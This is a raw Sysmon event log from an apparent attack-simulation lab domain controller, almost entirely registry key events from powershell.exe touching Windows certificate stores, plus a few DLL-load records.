Publishing 12241200x800000000000000057347740Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CTLs 12241200x800000000000000057347739Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CRLs 12241200x800000000000000057347738Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\Certificates 12241200x800000000000000057347737Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 12241200x800000000000000057347736Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Trust 12241200x800000000000000057347735Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057347734Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057347733Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057347732Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x800000000000000057347731Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057347730Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057347729Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057347728Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057347727Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057347726Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057347725Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057347724Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057347723Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x800000000000000057347722Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x800000000000000057347721Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs 12241200x800000000000000057347720Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates 12241200x800000000000000057347719Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057347718Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x800000000000000057347717Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CTLs 12241200x800000000000000057347716Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CRLs 12241200x800000000000000057347715Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\Certificates 12241200x800000000000000057347714Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople 12241200x800000000000000057347713Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople 12241200x800000000000000057347712Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057347711Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057347710Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057347709Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347708Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057347707Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057347706Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057347705Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347704Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347703Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057347702Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057347701Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057347700Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople 11241100x800000000000000057347699Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_wvzmt4gd.c4p.psm12021-11-12 12:18:44.422 12241200x800000000000000057347698Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057347697Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057347696Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057347695Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347694Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347693Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs 12241200x800000000000000057347692Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs 12241200x800000000000000057347691Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates 12241200x800000000000000057347690Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot 11241100x800000000000000057347689Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_poliyh52.fak.ps12021-11-12 12:18:44.422 734700x800000000000000057347688Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\1d96a7ae85e0bc7620b8688b778d0d77\System.Numerics.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Numerics.dllMD5=E2F37D6662BF0951356738A4F5ADB453,SHA256=D9849E412FEF691733299C42A71A6EFFFD859C8E88A0F5283ECC1FE5761EC4CCfalse-Unavailable 12241200x800000000000000057347687Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs 12241200x800000000000000057347686Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs 12241200x800000000000000057347685Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates 12241200x800000000000000057347684Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot 12241200x800000000000000057347683Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CTLs 12241200x800000000000000057347682Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CRLs 12241200x800000000000000057347681Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates 12241200x800000000000000057347680Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root 12241200x800000000000000057347679Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root 12241200x800000000000000057347678Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CTLs 12241200x800000000000000057347677Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CRLs 12241200x800000000000000057347676Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates 12241200x800000000000000057347675Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root 12241200x800000000000000057347674Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CTLs 12241200x800000000000000057347673Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CRLs 734700x800000000000000057347672Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\85691b702c65c1297dd5294e1969beb4\System.DirectoryServices.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.DirectoryServices.dllMD5=05D15B1B56CA953CA35E6738883CB557,SHA256=68DA3DBA92F2FFE1AAD95B46E65186EE16FC700AF01738E838732EF0B94F1A98false-Unavailable 12241200x800000000000000057347671Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates 12241200x800000000000000057347670Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot 12241200x800000000000000057347669Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs 12241200x800000000000000057347668Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs 12241200x800000000000000057347667Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates 734700x800000000000000057347666Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wldp.dll10.0.14393.3143 (rs1_release.190725-1725)Windows Lockdown PolicyMicrosoft® Windows® Operating SystemMicrosoft Corporationwldp.dllMD5=51A0208B106B4392AC4B3174B27A39EF,SHA256=EA9955976994C44DC091A07C69E9C863A4D5A960900019D3C4136BDFD1F885D4trueMicrosoft WindowsValid 12241200x800000000000000057347665Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT 12241200x800000000000000057347664Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT 12241200x800000000000000057347663Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs 12241200x800000000000000057347662Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs 12241200x800000000000000057347661Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates 12241200x800000000000000057347660Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root 12241200x800000000000000057347659Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root 12241200x800000000000000057347658Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347657Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347656Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.422{8B6011A9-5BA4-618E-52F3-04000000F101}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 